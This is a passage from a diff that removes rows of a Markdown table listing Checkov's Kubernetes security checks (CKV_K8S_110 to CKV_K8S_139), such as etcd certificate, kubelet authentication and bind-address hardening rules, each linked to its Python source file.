-| 3249 | CKV_K8S_110 | resource | DaemonSet | Ensure that the --service-account-private-key-file argument is set as appropriate | Kubernetes | [KubeControllerManagerServiceAccountPrivateKeyFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerServiceAccountPrivateKeyFile.py) |
-| 3250 | CKV_K8S_110 | resource | Deployment | Ensure that the --service-account-private-key-file argument is set as appropriate | Kubernetes | [KubeControllerManagerServiceAccountPrivateKeyFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerServiceAccountPrivateKeyFile.py) |
-| 3251 | CKV_K8S_110 | resource | DeploymentConfig | Ensure that the --service-account-private-key-file argument is set as appropriate | Kubernetes | [KubeControllerManagerServiceAccountPrivateKeyFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerServiceAccountPrivateKeyFile.py) |
-| 3252 | CKV_K8S_110 | resource | Job | Ensure that the --service-account-private-key-file argument is set as appropriate | Kubernetes | [KubeControllerManagerServiceAccountPrivateKeyFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerServiceAccountPrivateKeyFile.py) |
-| 3253 | CKV_K8S_110 | resource | Pod | Ensure that the --service-account-private-key-file argument is set as appropriate | Kubernetes | [KubeControllerManagerServiceAccountPrivateKeyFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerServiceAccountPrivateKeyFile.py) |
-| 3254 | CKV_K8S_110 | resource | PodTemplate | Ensure that the --service-account-private-key-file argument is set as appropriate | Kubernetes | [KubeControllerManagerServiceAccountPrivateKeyFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerServiceAccountPrivateKeyFile.py) |
-| 3255 | CKV_K8S_110 | resource | ReplicaSet | Ensure that the --service-account-private-key-file argument is set as appropriate | Kubernetes | [KubeControllerManagerServiceAccountPrivateKeyFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerServiceAccountPrivateKeyFile.py) |
-| 3256 | CKV_K8S_110 | resource | ReplicationController | Ensure that the --service-account-private-key-file argument is set as appropriate | Kubernetes | [KubeControllerManagerServiceAccountPrivateKeyFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerServiceAccountPrivateKeyFile.py) |
-| 3257 | CKV_K8S_110 | resource | StatefulSet | Ensure that the --service-account-private-key-file argument is set as appropriate | Kubernetes | [KubeControllerManagerServiceAccountPrivateKeyFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerServiceAccountPrivateKeyFile.py) |
-| 3258 | CKV_K8S_111 | resource | CronJob | Ensure that the --root-ca-file argument is set as appropriate | Kubernetes | [KubeControllerManagerRootCAFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerRootCAFile.py) |
-| 3259 | CKV_K8S_111 | resource | DaemonSet | Ensure that the --root-ca-file argument is set as appropriate | Kubernetes | [KubeControllerManagerRootCAFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerRootCAFile.py) |
-| 3260 | CKV_K8S_111 | resource | Deployment | Ensure that the --root-ca-file argument is set as appropriate | Kubernetes | [KubeControllerManagerRootCAFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerRootCAFile.py) |
-| 3261 | CKV_K8S_111 | resource | DeploymentConfig | Ensure that the --root-ca-file argument is set as appropriate | Kubernetes | [KubeControllerManagerRootCAFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerRootCAFile.py) |
-| 3262 | CKV_K8S_111 | resource | Job | Ensure that the --root-ca-file argument is set as appropriate | Kubernetes | [KubeControllerManagerRootCAFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerRootCAFile.py) |
-| 3263 | CKV_K8S_111 | resource | Pod | Ensure that the --root-ca-file argument is set as appropriate | Kubernetes | [KubeControllerManagerRootCAFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerRootCAFile.py) |
-| 3264 | CKV_K8S_111 | resource | PodTemplate | Ensure that the --root-ca-file argument is set as appropriate | Kubernetes | [KubeControllerManagerRootCAFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerRootCAFile.py) |
-| 3265 | CKV_K8S_111 | resource | ReplicaSet | Ensure that the --root-ca-file argument is set as appropriate | Kubernetes | [KubeControllerManagerRootCAFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerRootCAFile.py) |
-| 3266 | CKV_K8S_111 | resource | ReplicationController | Ensure that the --root-ca-file argument is set as appropriate | Kubernetes | [KubeControllerManagerRootCAFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerRootCAFile.py) |
-| 3267 | CKV_K8S_111 | resource | StatefulSet | Ensure that the --root-ca-file argument is set as appropriate | Kubernetes | [KubeControllerManagerRootCAFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerRootCAFile.py) |
-| 3268 | CKV_K8S_112 | resource | CronJob | Ensure that the RotateKubeletServerCertificate argument is set to true | Kubernetes | [RotateKubeletServerCertificate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RotateKubeletServerCertificate.py) |
-| 3269 | CKV_K8S_112 | resource | DaemonSet | Ensure that the RotateKubeletServerCertificate argument is set to true | Kubernetes | [RotateKubeletServerCertificate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RotateKubeletServerCertificate.py) |
-| 3270 | CKV_K8S_112 | resource | Deployment | Ensure that the RotateKubeletServerCertificate argument is set to true | Kubernetes | [RotateKubeletServerCertificate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RotateKubeletServerCertificate.py) |
-| 3271 | CKV_K8S_112 | resource | DeploymentConfig | Ensure that the RotateKubeletServerCertificate argument is set to true | Kubernetes | [RotateKubeletServerCertificate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RotateKubeletServerCertificate.py) |
-| 3272 | CKV_K8S_112 | resource | Job | Ensure that the RotateKubeletServerCertificate argument is set to true | Kubernetes | [RotateKubeletServerCertificate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RotateKubeletServerCertificate.py) |
-| 3273 | CKV_K8S_112 | resource | Pod | Ensure that the RotateKubeletServerCertificate argument is set to true | Kubernetes | [RotateKubeletServerCertificate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RotateKubeletServerCertificate.py) |
-| 3274 | CKV_K8S_112 | resource | PodTemplate | Ensure that the RotateKubeletServerCertificate argument is set to true | Kubernetes | [RotateKubeletServerCertificate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RotateKubeletServerCertificate.py) |
-| 3275 | CKV_K8S_112 | resource | ReplicaSet | Ensure that the RotateKubeletServerCertificate argument is set to true | Kubernetes | [RotateKubeletServerCertificate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RotateKubeletServerCertificate.py) |
-| 3276 | CKV_K8S_112 | resource | ReplicationController | Ensure that the RotateKubeletServerCertificate argument is set to true | Kubernetes | [RotateKubeletServerCertificate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RotateKubeletServerCertificate.py) |
-| 3277 | CKV_K8S_112 | resource | StatefulSet | Ensure that the RotateKubeletServerCertificate argument is set to true | Kubernetes | [RotateKubeletServerCertificate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RotateKubeletServerCertificate.py) |
-| 3278 | CKV_K8S_113 | resource | CronJob | Ensure that the --bind-address argument is set to 127.0.0.1 | Kubernetes | [ControllerManagerBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ControllerManagerBindAddress.py) |
-| 3279 | CKV_K8S_113 | resource | DaemonSet | Ensure that the --bind-address argument is set to 127.0.0.1 | Kubernetes | [ControllerManagerBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ControllerManagerBindAddress.py) |
-| 3280 | CKV_K8S_113 | resource | Deployment | Ensure that the --bind-address argument is set to 127.0.0.1 | Kubernetes | [ControllerManagerBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ControllerManagerBindAddress.py) |
-| 3281 | CKV_K8S_113 | resource | DeploymentConfig | Ensure that the --bind-address argument is set to 127.0.0.1 | Kubernetes | [ControllerManagerBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ControllerManagerBindAddress.py) |
-| 3282 | CKV_K8S_113 | resource | Job | Ensure that the --bind-address argument is set to 127.0.0.1 | Kubernetes | [ControllerManagerBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ControllerManagerBindAddress.py) |
-| 3283 | CKV_K8S_113 | resource | Pod | Ensure that the --bind-address argument is set to 127.0.0.1 | Kubernetes | [ControllerManagerBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ControllerManagerBindAddress.py) |
-| 3284 | CKV_K8S_113 | resource | PodTemplate | Ensure that the --bind-address argument is set to 127.0.0.1 | Kubernetes | [ControllerManagerBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ControllerManagerBindAddress.py) |
-| 3285 | CKV_K8S_113 | resource | ReplicaSet | Ensure that the --bind-address argument is set to 127.0.0.1 | Kubernetes | [ControllerManagerBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ControllerManagerBindAddress.py) |
-| 3286 | CKV_K8S_113 | resource | ReplicationController | Ensure that the --bind-address argument is set to 127.0.0.1 | Kubernetes | [ControllerManagerBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ControllerManagerBindAddress.py) |
-| 3287 | CKV_K8S_113 | resource | StatefulSet | Ensure that the --bind-address argument is set to 127.0.0.1 | Kubernetes | [ControllerManagerBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ControllerManagerBindAddress.py) |
-| 3288 | CKV_K8S_114 | resource | CronJob | Ensure that the --profiling argument is set to false | Kubernetes | [SchedulerProfiling.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SchedulerProfiling.py) |
-| 3289 | CKV_K8S_114 | resource | DaemonSet | Ensure that the --profiling argument is set to false | Kubernetes | [SchedulerProfiling.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SchedulerProfiling.py) |
-| 3290 | CKV_K8S_114 | resource | Deployment | Ensure that the --profiling argument is set to false | Kubernetes | [SchedulerProfiling.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SchedulerProfiling.py) |
-| 3291 | CKV_K8S_114 | resource | DeploymentConfig | Ensure that the --profiling argument is set to false | Kubernetes | [SchedulerProfiling.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SchedulerProfiling.py) |
-| 3292 | CKV_K8S_114 | resource | Job | Ensure that the --profiling argument is set to false | Kubernetes | [SchedulerProfiling.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SchedulerProfiling.py) |
-| 3293 | CKV_K8S_114 | resource | Pod | Ensure that the --profiling argument is set to false | Kubernetes | [SchedulerProfiling.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SchedulerProfiling.py) |
-| 3294 | CKV_K8S_114 | resource | PodTemplate | Ensure that the --profiling argument is set to false | Kubernetes | [SchedulerProfiling.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SchedulerProfiling.py) |
-| 3295 | CKV_K8S_114 | resource | ReplicaSet | Ensure that the --profiling argument is set to false | Kubernetes | [SchedulerProfiling.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SchedulerProfiling.py) |
-| 3296 | CKV_K8S_114 | resource | ReplicationController | Ensure that the --profiling argument is set to false | Kubernetes | [SchedulerProfiling.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SchedulerProfiling.py) |
-| 3297 | CKV_K8S_114 | resource | StatefulSet | Ensure that the --profiling argument is set to false | Kubernetes | [SchedulerProfiling.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SchedulerProfiling.py) |
-| 3298 | CKV_K8S_115 | resource | CronJob | Ensure that the --bind-address argument is set to 127.0.0.1 | Kubernetes | [SchedulerBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SchedulerBindAddress.py) |
-| 3299 | CKV_K8S_115 | resource | DaemonSet | Ensure that the --bind-address argument is set to 127.0.0.1 | Kubernetes | [SchedulerBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SchedulerBindAddress.py) |
-| 3300 | CKV_K8S_115 | resource | Deployment | Ensure that the --bind-address argument is set to 127.0.0.1 | Kubernetes | [SchedulerBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SchedulerBindAddress.py) |
-| 3301 | CKV_K8S_115 | resource | DeploymentConfig | Ensure that the --bind-address argument is set to 127.0.0.1 | Kubernetes | [SchedulerBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SchedulerBindAddress.py) |
-| 3302 | CKV_K8S_115 | resource | Job | Ensure that the --bind-address argument is set to 127.0.0.1 | Kubernetes | [SchedulerBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SchedulerBindAddress.py) |
-| 3303 | CKV_K8S_115 | resource | Pod | Ensure that the --bind-address argument is set to 127.0.0.1 | Kubernetes | [SchedulerBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SchedulerBindAddress.py) |
-| 3304 | CKV_K8S_115 | resource | PodTemplate | Ensure that the --bind-address argument is set to 127.0.0.1 | Kubernetes | [SchedulerBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SchedulerBindAddress.py) |
-| 3305 | CKV_K8S_115 | resource | ReplicaSet | Ensure that the --bind-address argument is set to 127.0.0.1 | Kubernetes | [SchedulerBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SchedulerBindAddress.py) |
-| 3306 | CKV_K8S_115 | resource | ReplicationController | Ensure that the --bind-address argument is set to 127.0.0.1 | Kubernetes | [SchedulerBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SchedulerBindAddress.py) |
-| 3307 | CKV_K8S_115 | resource | StatefulSet | Ensure that the --bind-address argument is set to 127.0.0.1 | Kubernetes | [SchedulerBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SchedulerBindAddress.py) |
-| 3308 | CKV_K8S_116 | resource | CronJob | Ensure that the --cert-file and --key-file arguments are set as appropriate | Kubernetes | [EtcdCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdCertAndKey.py) |
-| 3309 | CKV_K8S_116 | resource | DaemonSet | Ensure that the --cert-file and --key-file arguments are set as appropriate | Kubernetes | [EtcdCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdCertAndKey.py) |
-| 3310 | CKV_K8S_116 | resource | Deployment | Ensure that the --cert-file and --key-file arguments are set as appropriate | Kubernetes | [EtcdCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdCertAndKey.py) |
-| 3311 | CKV_K8S_116 | resource | DeploymentConfig | Ensure that the --cert-file and --key-file arguments are set as appropriate | Kubernetes | [EtcdCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdCertAndKey.py) |
-| 3312 | CKV_K8S_116 | resource | Job | Ensure that the --cert-file and --key-file arguments are set as appropriate | Kubernetes | [EtcdCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdCertAndKey.py) |
-| 3313 | CKV_K8S_116 | resource | Pod | Ensure that the --cert-file and --key-file arguments are set as appropriate | Kubernetes | [EtcdCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdCertAndKey.py) |
-| 3314 | CKV_K8S_116 | resource | PodTemplate | Ensure that the --cert-file and --key-file arguments are set as appropriate | Kubernetes | [EtcdCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdCertAndKey.py) |
-| 3315 | CKV_K8S_116 | resource | ReplicaSet | Ensure that the --cert-file and --key-file arguments are set as appropriate | Kubernetes | [EtcdCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdCertAndKey.py) |
-| 3316 | CKV_K8S_116 | resource | ReplicationController | Ensure that the --cert-file and --key-file arguments are set as appropriate | Kubernetes | [EtcdCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdCertAndKey.py) |
-| 3317 | CKV_K8S_116 | resource | StatefulSet | Ensure that the --cert-file and --key-file arguments are set as appropriate | Kubernetes | [EtcdCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdCertAndKey.py) |
-| 3318 | CKV_K8S_117 | resource | CronJob | Ensure that the --client-cert-auth argument is set to true | Kubernetes | [EtcdClientCertAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdClientCertAuth.py) |
-| 3319 | CKV_K8S_117 | resource | DaemonSet | Ensure that the --client-cert-auth argument is set to true | Kubernetes | [EtcdClientCertAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdClientCertAuth.py) |
-| 3320 | CKV_K8S_117 | resource | Deployment | Ensure that the --client-cert-auth argument is set to true | Kubernetes | [EtcdClientCertAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdClientCertAuth.py) |
-| 3321 | CKV_K8S_117 | resource | DeploymentConfig | Ensure that the --client-cert-auth argument is set to true | Kubernetes | [EtcdClientCertAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdClientCertAuth.py) |
-| 3322 | CKV_K8S_117 | resource | Job | Ensure that the --client-cert-auth argument is set to true | Kubernetes | [EtcdClientCertAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdClientCertAuth.py) |
-| 3323 | CKV_K8S_117 | resource | Pod | Ensure that the --client-cert-auth argument is set to true | Kubernetes | [EtcdClientCertAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdClientCertAuth.py) |
-| 3324 | CKV_K8S_117 | resource | PodTemplate | Ensure that the --client-cert-auth argument is set to true | Kubernetes | [EtcdClientCertAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdClientCertAuth.py) |
-| 3325 | CKV_K8S_117 | resource | ReplicaSet | Ensure that the --client-cert-auth argument is set to true | Kubernetes | [EtcdClientCertAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdClientCertAuth.py) |
-| 3326 | CKV_K8S_117 | resource | ReplicationController | Ensure that the --client-cert-auth argument is set to true | Kubernetes | [EtcdClientCertAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdClientCertAuth.py) |
-| 3327 | CKV_K8S_117 | resource | StatefulSet | Ensure that the --client-cert-auth argument is set to true | Kubernetes | [EtcdClientCertAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdClientCertAuth.py) |
-| 3328 | CKV_K8S_118 | resource | CronJob | Ensure that the --auto-tls argument is not set to true | Kubernetes | [EtcdAutoTls.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdAutoTls.py) |
-| 3329 | CKV_K8S_118 | resource | DaemonSet | Ensure that the --auto-tls argument is not set to true | Kubernetes | [EtcdAutoTls.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdAutoTls.py) |
-| 3330 | CKV_K8S_118 | resource | Deployment | Ensure that the --auto-tls argument is not set to true | Kubernetes | [EtcdAutoTls.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdAutoTls.py) |
-| 3331 | CKV_K8S_118 | resource | DeploymentConfig | Ensure that the --auto-tls argument is not set to true | Kubernetes | [EtcdAutoTls.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdAutoTls.py) |
-| 3332 | CKV_K8S_118 | resource | Job | Ensure that the --auto-tls argument is not set to true | Kubernetes | [EtcdAutoTls.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdAutoTls.py) |
-| 3333 | CKV_K8S_118 | resource | Pod | Ensure that the --auto-tls argument is not set to true | Kubernetes | [EtcdAutoTls.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdAutoTls.py) |
-| 3334 | CKV_K8S_118 | resource | PodTemplate | Ensure that the --auto-tls argument is not set to true | Kubernetes | [EtcdAutoTls.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdAutoTls.py) |
-| 3335 | CKV_K8S_118 | resource | ReplicaSet | Ensure that the --auto-tls argument is not set to true | Kubernetes | [EtcdAutoTls.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdAutoTls.py) |
-| 3336 | CKV_K8S_118 | resource | ReplicationController | Ensure that the --auto-tls argument is not set to true | Kubernetes | [EtcdAutoTls.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdAutoTls.py) |
-| 3337 | CKV_K8S_118 | resource | StatefulSet | Ensure that the --auto-tls argument is not set to true | Kubernetes | [EtcdAutoTls.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdAutoTls.py) |
-| 3338 | CKV_K8S_119 | resource | CronJob | Ensure that the --peer-cert-file and --peer-key-file arguments are set as appropriate | Kubernetes | [EtcdPeerFiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdPeerFiles.py) |
-| 3339 | CKV_K8S_119 | resource | DaemonSet | Ensure that the --peer-cert-file and --peer-key-file arguments are set as appropriate | Kubernetes | [EtcdPeerFiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdPeerFiles.py) |
-| 3340 | CKV_K8S_119 | resource | Deployment | Ensure that the --peer-cert-file and --peer-key-file arguments are set as appropriate | Kubernetes | [EtcdPeerFiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdPeerFiles.py) |
-| 3341 | CKV_K8S_119 | resource | DeploymentConfig | Ensure that the --peer-cert-file and --peer-key-file arguments are set as appropriate | Kubernetes | [EtcdPeerFiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdPeerFiles.py) |
-| 3342 | CKV_K8S_119 | resource | Job | Ensure that the --peer-cert-file and --peer-key-file arguments are set as appropriate | Kubernetes | [EtcdPeerFiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdPeerFiles.py) |
-| 3343 | CKV_K8S_119 | resource | Pod | Ensure that the --peer-cert-file and --peer-key-file arguments are set as appropriate | Kubernetes | [EtcdPeerFiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdPeerFiles.py) |
-| 3344 | CKV_K8S_119 | resource | PodTemplate | Ensure that the --peer-cert-file and --peer-key-file arguments are set as appropriate | Kubernetes | [EtcdPeerFiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdPeerFiles.py) |
-| 3345 | CKV_K8S_119 | resource | ReplicaSet | Ensure that the --peer-cert-file and --peer-key-file arguments are set as appropriate | Kubernetes | [EtcdPeerFiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdPeerFiles.py) |
-| 3346 | CKV_K8S_119 | resource | ReplicationController | Ensure that the --peer-cert-file and --peer-key-file arguments are set as appropriate | Kubernetes | [EtcdPeerFiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdPeerFiles.py) |
-| 3347 | CKV_K8S_119 | resource | StatefulSet | Ensure that the --peer-cert-file and --peer-key-file arguments are set as appropriate | Kubernetes | [EtcdPeerFiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdPeerFiles.py) |
-| 3348 | CKV_K8S_121 | resource | Pod | Ensure that the --peer-client-cert-auth argument is set to true | Kubernetes | [PeerClientCertAuthTrue.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/PeerClientCertAuthTrue.py) |
-| 3349 | CKV_K8S_138 | resource | CronJob | Ensure that the --anonymous-auth argument is set to false | Kubernetes | [KubeletAnonymousAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletAnonymousAuth.py) |
-| 3350 | CKV_K8S_138 | resource | DaemonSet | Ensure that the --anonymous-auth argument is set to false | Kubernetes | [KubeletAnonymousAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletAnonymousAuth.py) |
-| 3351 | CKV_K8S_138 | resource | Deployment | Ensure that the --anonymous-auth argument is set to false | Kubernetes | [KubeletAnonymousAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletAnonymousAuth.py) |
-| 3352 | CKV_K8S_138 | resource | DeploymentConfig | Ensure that the --anonymous-auth argument is set to false | Kubernetes | [KubeletAnonymousAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletAnonymousAuth.py) |
-| 3353 | CKV_K8S_138 | resource | Job | Ensure that the --anonymous-auth argument is set to false | Kubernetes | [KubeletAnonymousAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletAnonymousAuth.py) |
-| 3354 | CKV_K8S_138 | resource | Pod | Ensure that the --anonymous-auth argument is set to false | Kubernetes | 
[KubeletAnonymousAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletAnonymousAuth.py) | -| 3355 | CKV_K8S_138 | resource | PodTemplate | Ensure that the --anonymous-auth argument is set to false | Kubernetes | [KubeletAnonymousAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletAnonymousAuth.py) | -| 3356 | CKV_K8S_138 | resource | ReplicaSet | Ensure that the --anonymous-auth argument is set to false | Kubernetes | [KubeletAnonymousAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletAnonymousAuth.py) | -| 3357 | CKV_K8S_138 | resource | ReplicationController | Ensure that the --anonymous-auth argument is set to false | Kubernetes | [KubeletAnonymousAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletAnonymousAuth.py) | -| 3358 | CKV_K8S_138 | resource | StatefulSet | Ensure that the --anonymous-auth argument is set to false | Kubernetes | [KubeletAnonymousAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletAnonymousAuth.py) | -| 3359 | CKV_K8S_139 | resource | CronJob | Ensure that the --authorization-mode argument is not set to AlwaysAllow | Kubernetes | [KubeletAuthorizationModeNotAlwaysAllow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletAuthorizationModeNotAlwaysAllow.py) | -| 3360 | CKV_K8S_139 | resource | DaemonSet | 